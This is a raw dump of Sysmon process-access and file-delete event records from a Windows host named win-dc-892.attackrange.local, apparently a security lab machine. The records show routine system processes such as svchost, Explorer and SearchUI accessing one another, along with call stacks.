10341000x80000000000000006330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.097{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.097{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.097{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.097{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.857{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.857{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+7e00|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.841{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+7e00|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.639{266CAFBE-646C-6064-1000-00000000AE01}11242344C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.639{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.218{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2B1D239B3B4CD85B7DDA9A34F5F26D3,SHA256=8C0C558C6F14532B4CE74F6206FABFB9B046A1B956BD92EE5642AC18CC9FA60E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.218{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8D8F048B8B6F9CC3D33660EFB80CCBB,SHA256=20A174C0A95B8CD8D13133CF9932408D8DD17D47CF9EC646EE38FF14129E32AD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.172{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.172{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.172{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.172{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.172{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:29.172{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.172{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3dff|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.156{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3dff|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.094{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5266|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.094{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.094{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.094{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:29.094{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 